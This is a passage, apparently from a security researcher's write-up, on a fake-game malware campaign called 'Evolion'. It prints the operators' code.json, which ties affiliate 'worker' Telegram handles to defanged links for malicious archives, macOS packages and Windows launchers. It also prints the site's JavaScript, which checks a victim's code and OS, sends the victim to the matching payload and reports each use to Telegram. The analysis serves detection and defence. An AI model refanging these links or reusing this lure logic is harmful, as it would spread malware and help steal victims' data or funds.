        "id": 92,
        "code": "GSQ6-3UUA",
        "worker": "12trueseller - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 93,
        "code": "GSQ6-QW49",
        "worker": "12trueseller - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 94,
        "code": "HJ19-6CCA",
        "worker": "12MonkeyyDrainer - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 95,
        "code": "HJ19-KL12",
        "worker": "12MonkeyyDrainer - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 96,
        "code": "HJ19-KJJ8",
        "worker": "12MonkeyyDrainer - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 97,
        "code": "YRR8-5UPL",
        "worker": "12s0vnloshed - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 98,
        "code": "YRR8-5UAO",
        "worker": "12s0vnloshed - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 99,
        "code": "YRR8-HQ69",
        "worker": "12s0vnloshed - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 100,
        "code": "ENN7-Q28A",
        "worker": "12x2033 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 101,
        "code": "ENN7-QBV0",
        "worker": "12x2033 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 102,
        "code": "ENN7-DV96",
        "worker": "12x2033 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 103,
        "code": "SOW1-AU80",
        "worker": "12svomaster - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 104,
        "code": "SOW1-AW5B",
        "worker": "12svomaster - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 105,
        "code": "SOW1-Y43H",
        "worker": "12svomaster - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 106,
        "code": "JAK3-XX79",
        "worker": "12benjaminlinys - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 107,
        "code": "JAK3-X29O",
        "worker": "12benjaminlinys - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 108,
        "code": "JAK3-I70A",
        "worker": "12benjaminlinys - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 109,
        "code": "ZA81-GDLU",
        "worker": "12b4b2188717aaaf8ff715114b39cdfeb9 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 110,
        "code": "ZA81-GD2C",
        "worker": "12b4b2188717aaaf8ff715114b39cdfeb9 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 111,
        "code": "ZA81-EO90",
        "worker": "12b4b2188717aaaf8ff715114b39cdfeb9 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 112,
        "code": "NM12-PLLG",
        "worker": "12avingon - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 113,
        "code": "NM12-PWQ9",
        "worker": "12avingon - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 114,
        "code": "NM12-RO8L",
        "worker": "12avingon - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 115,
        "code": "MI6G-SOL2",
        "worker": "12erusonyc - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 116,
        "code": "MI6G-SW69",
        "worker": "12erusonyc - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 117,
        "code": "MI6G-1ION",
        "worker": "12erusonyc - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 118,
        "code": "TWW1-Q90A",
        "worker": "12PAV_LO_W - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 119,
        "code": "TWW1-F81S",
        "worker": "12PAV_LO_W - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 120,
        "code": "TWW1-PP9Z",
        "worker": "12PAV_LO_W - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 121,
        "code": "RYT2-HOP9",
        "worker": "12m0x165C - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 122,
        "code": "RYT2-HA89",
        "worker": "12m0x165C - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 123,
        "code": "RYT2-VX9M",
        "worker": "12m0x165C - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 124,
        "code": "CAIP-28AE",
        "worker": "12asketq - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 125,
        "code": "CAIP-2AY1",
        "worker": "12asketq - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 126,
        "code": "CAIP-2WWL",
        "worker": "12asketq - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 127,
        "code": "RQJ2-5HUP",
        "worker": "12another1evel - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 128,
        "code": "RQJ2-5HQ9",
        "worker": "12another1evel - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 129,
        "code": "RQJ2-SS89",
        "worker": "12another1evel - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 130,
        "code": "AQ6M-Y2KL",
        "worker": "My code - MAC",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 131,
        "code": "CY27-QUU9",
        "worker": "12shure_name_no - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 132,
        "code": "CY27-Q03X",
        "worker": "12shure_name_no - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 133,
        "code": "CY27-RP8H",
        "worker": "12shure_name_no - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 134,
        "code": "I2QW-RTY7",
        "worker": "12billsteine - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 135,
        "code": "I2QW-RQS1",
        "worker": "12billsteine - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 136,
        "code": "I2QW-6GE8",
        "worker": "12billsteine - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 137,
        "code": "PEW5-G84K",
        "worker": "12kettoplus - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 138,
        "code": "PEW5-GS3K",
        "worker": "12kettoplus - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 139,
        "code": "PEW5-Y1L0",
        "worker": "12kettoplus - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 140,
        "code": "AQ6M-YA1H",
        "worker": "My code - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 141,
        "code": "FQ8K-ZBE0",
        "worker": "12Hastihit - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 142,
        "code": "FQ8K-ZY29",
        "worker": "12Hastihit - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 143,
        "code": "FQ8K-Z2KK",
        "worker": "12Hastihit - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 144,
        "code": "SIU3-AP72",
        "worker": "12RoN771 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 145,
        "code": "SIU3-AW2J",
        "worker": "12RoN771 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 146,
        "code": "SIU3-QP7M",
        "worker": "12RoN771 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 147,
        "code": "HE8A-QI65",
        "worker": "12finessetillidie - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 148,
        "code": "HE8A-Q12B",
        "worker": "12finessetillidie - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 149,
        "code": "HE8A-S5VY",
        "worker": "12finessetillidie - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 150,
        "code": "ZI9Q-BU5M",
        "worker": "12MDMwe - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 151,
        "code": "ZI9Q-BA11",
        "worker": "12MDMwe - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 152,
        "code": "ZI9Q-W20T",
        "worker": "12MDMwe - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 153,
        "code": "TE8B-Q3NM",
        "worker": "12TosterWhite - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 154,
        "code": "TE8B-QZ67",
        "worker": "12TosterWhite - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 155,
        "code": "TE8B-QR1F",
        "worker": "12TosterWhite - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    },
    {
        "id": 156,
        "code": "WJ9X-VS12",
        "worker": "12michigun11 - Archive",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]rar"
    },
    {
        "id": 157,
        "code": "WJ9X-V1SU",
        "worker": "12michigun11 - Mac",
        "link": "hxxps[://]github[.]com/EvolionBeta/evolion/raw/main/Evolion[.]pkg"
    },
    {
        "id": 158,
        "code": "WJ9X-A30T",
        "worker": "12michigun11 - Launcher",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe"
    }
]

You may have noticed that 12 is prefixed for most workers. Simply change it to @ to turn it into a Telegram username. We can see @MonkeyyDrainer again on IDs 94 to 96.

Just recently, they updated their JavaScript code and code.json to check the OS of the target, add more workers, and change the download links.

JavaScript (5-27-2023)

// Открыть модальное окно
document.getElementById("open-modal-btn-one").addEventListener("click", function() {
    document.getElementById("my-modal").classList.add("open")
})

// Закрыть модальное окно
document.getElementById("close-my-modal-btn").addEventListener("click", function() {
    document.getElementById("my-modal").classList.remove("open")
})

// Закрыть модальное окно при нажатии на Esc
window.addEventListener('keydown', (e) => {
    if (e.key === "Escape") {
        document.getElementById("my-modal").classList.remove("open")
    }
});

// Закрыть модальное окно при клике вне его
document.querySelector("#my-modal .modal__box").addEventListener('click', event => {
    event._isClickWithInModal = true;
});
document.getElementById("my-modal").addEventListener('click', event => {
    if (event._isClickWithInModal) return;
    event.currentTarget.classList.remove('open');
});

// Открыть модальное окно
document.getElementById("open-modal-btn").addEventListener("click", function() {
    document.getElementById("my-modal").classList.add("open")
})

// Закрыть модальное окно
document.getElementById("close-my-modal-btn").addEventListener("click", function() {
    document.getElementById("my-modal").classList.remove("open")
})

// Закрыть модальное окно при нажатии на Esc
window.addEventListener('keydown', (e) => {
    if (e.key === "Escape") {
        document.getElementById("my-modal").classList.remove("open")
    }
});

// Закрыть модальное окно при клике вне его
document.querySelector("#my-modal .modal__box").addEventListener('click', event => {
    event._isClickWithInModal = true;
});
document.getElementById("my-modal").addEventListener('click', event => {
    if (event._isClickWithInModal) return;
    event.currentTarget.classList.remove('open');
});

document.querySelector('#signin').addEventListener('submit', e => {
   e.preventDefault()
   const input = e.target.querySelector('input')
   if (e.target.querySelector('input').value.trim()) {
      fetch(`/code.json?1=${Math.random()}`)
      .then(response => response.json())
      .then(data => {
         console.log(data)
         let flag = false;
         data.forEach(item => {
            if (item.code == input.value) {
               flag = true
               fetch('/action/checkOS.php')
               .then(osResponse => osResponse.json())
               .then((osResponse) => {
                  console.log(osResponse)
                  if (osResponse) {
                     window.location.href = item.oslink
                     console.log('mac')
                  }

                  if (!osResponse) {
                     window.location.href = item.link
                     console.log('other')
                  }

                  fetch('/telegram_curl.php', {
                     method: 'post',
                     body: JSON.stringify({code: input.value}),
                     headers: {
                        'content-type': 'application/json'
                     }
                  })

                  return
               })
            
               return
            }
         })

         if (!flag) {
            input.classList.add('shakes')
            setTimeout(() => input.classList.remove('shakes'), 800)
            e.preventDefault()
            return
         }
      });
   }
})

code.json (5-27-2023)

[
    {
        "id": 1,
        "code": "JW1Q-O99P",
        "worker": "All RAR Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 3,
        "code": "AA98-1QMN",
        "worker": "All Launcher Code",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 4,
        "code": "ZZ19-W92L",
        "worker": "12jet3web - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 5,
        "code": "ZZ19-W913",
        "worker": "12jet3web - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 8,
        "code": "MN21-TT1K",
        "worker": "12BillionCounter - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 9,
        "code": "MN21-TK99",
        "worker": "12BillionCounter - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 12,
        "code": "OO19-Z8QQ",
        "worker": "12Ombrre - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 14,
        "code": "GH11-D988",
        "worker": "12Nixer1339 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 17,
        "code": "LI28-QAZ1",
        "worker": "12HeisenbergWolter - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 19,
        "code": "LI28-PO12",
        "worker": "12HeisenbergWolter - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 20,
        "code": "KL19-DJ21",
        "worker": "12Ombrre",
        "link": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 22,
        "code": "OO87-1CB6",
        "worker": "12purification999 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 24,
        "code": "OO87-LO8P",
        "worker": "12purification999 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 25,
        "code": "X21N-KL88",
        "worker": "12Askwkssk - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 27,
        "code": "X21N-7IO1",
        "worker": "12Askwkssk - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 28,
        "code": "HG87-1VNM",
        "worker": "12wbsceva - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 30,
        "code": "HG87-O71H",
        "worker": "12wbsceva - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 31,
        "code": "Z80B-ML1H",
        "worker": "12atom911 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 33,
        "code": "Z80B-LPP1",
        "worker": "12atom911 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 34,
        "code": "FG19-1LM7",
        "worker": "12glebredbull - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 36,
        "code": "FG19-AQ11",
        "worker": "12glebredbull - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 37,
        "code": "QW89-1GOP",
        "worker": "12h0pefulrabbit - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 39,
        "code": "QW89-K3AA",
        "worker": "12h0pefulrabbit - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 40,
        "code": "H1C8-SAK9",
        "worker": "12bamboombam - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 42,
        "code": "H1C8-QQ9P",
        "worker": "12bamboombam - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 43,
        "code": "JQO2-RR67",
        "worker": "12SPAN4money - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 45,
        "code": "JQO2-RL1K",
        "worker": "12SPAN4money - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 46,
        "code": "AL6M-YY28",
        "worker": "12wwwdew - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 48,
        "code": "AL6M-N41G",
        "worker": "12wwwdew - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 49,
        "code": "V1LI-TW80",
        "worker": "12FlashHound4216 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 51,
        "code": "V1LI-AK2C",
        "worker": "12FlashHound4216 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 52,
        "code": "BM8J-12QO",
        "worker": "12benfu18 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 54,
        "code": "BM8J-Q451",
        "worker": "12benfu18 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 55,
        "code": "SO64-YRL1",
        "worker": "12bloodyaaron - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 57,
        "code": "SO64-2LK8",
        "worker": "12bloodyaaron - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 58,
        "code": "KQ15-Z5KP",
        "worker": "12maisiewilens - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 60,
        "code": "KQ15-LO3A",
        "worker": "12maisiewilens - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 61,
        "code": "WY3J-EK11",
        "worker": "12fishingNFT - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 63,
        "code": "WY3J-ELI6",
        "worker": "12fishingNFT - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 64,
        "code": "V8DD-F64N",
        "worker": "12nujenxanax - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 66,
        "code": "V8DD-T9JJ",
        "worker": "12nujenxanax - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 67,
        "code": "BL1F-RR83",
        "worker": "12craaassshysh - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 69,
        "code": "BL1F-RCC0",
        "worker": "12craaassshysh - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 70,
        "code": "GLQ3-U59Z",
        "worker": "12azpunks - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 72,
        "code": "GLQ3-PI61",
        "worker": "12azpunks - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 73,
        "code": "SS73-IYL9",
        "worker": "12Marif1777 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 75,
        "code": "SS73-IY1J",
        "worker": "12Marif1777 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 76,
        "code": "UQ4J-RX22",
        "worker": "12NEVR2DEVTH - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 78,
        "code": "UQ4J-PO90",
        "worker": "12NEVR2DEVTH - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 79,
        "code": "DO7L-WWIN",
        "worker": "12number_oneBC - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 81,
        "code": "DO7L-LO8P",
        "worker": "12number_oneBC - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 82,
        "code": "SJ87-B91R",
        "worker": "12user12574 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 84,
        "code": "SJ87-BHQQ",
        "worker": "12user12574 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 85,
        "code": "DH8L-ZX10",
        "worker": "12LiamDrain - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 87,
        "code": "DH8L-LI89",
        "worker": "12LiamDrain - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 88,
        "code": "BIG7-HH28",
        "worker": "12D3ViLBBY - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 90,
        "code": "BIG7-HKL6",
        "worker": "12D3ViLBBY - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 91,
        "code": "GSQ6-3UIK",
        "worker": "12trueseller - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 93,
        "code": "GSQ6-QW49",
        "worker": "12trueseller - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 94,
        "code": "HJ19-6CCA",
        "worker": "12MonkeyyDrainer - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 96,
        "code": "HJ19-KJJ8",
        "worker": "12MonkeyyDrainer - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 97,
        "code": "YRR8-5UPL",
        "worker": "12s0vnloshed - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 99,
        "code": "YRR8-HQ69",
        "worker": "12s0vnloshed - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 100,
        "code": "ENN7-Q28A",
        "worker": "12x2033 - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 102,
        "code": "ENN7-DV96",
        "worker": "12x2033 - OS",
        "link": "hxxps[://]evoliongame[.]com/Evolion%20Launcher[.]exe",
        "oslink": "hxxps[://]www[.]dropbox[.]com/s/9q3aa3l3uos5vag/Evolion[.]pkg?dl=1"
    },
    {
        "id": 103,
        "code": "SOW1-AU80",
        "worker": "12svomaster - Archive",
        "link": "hxxps[://]evoliongame[.]com/Evolion[.]rar"
    },
    {
        "id": 105,
        "code": "SOW1-Y43H",
        "worker": "12svomaster - OS",
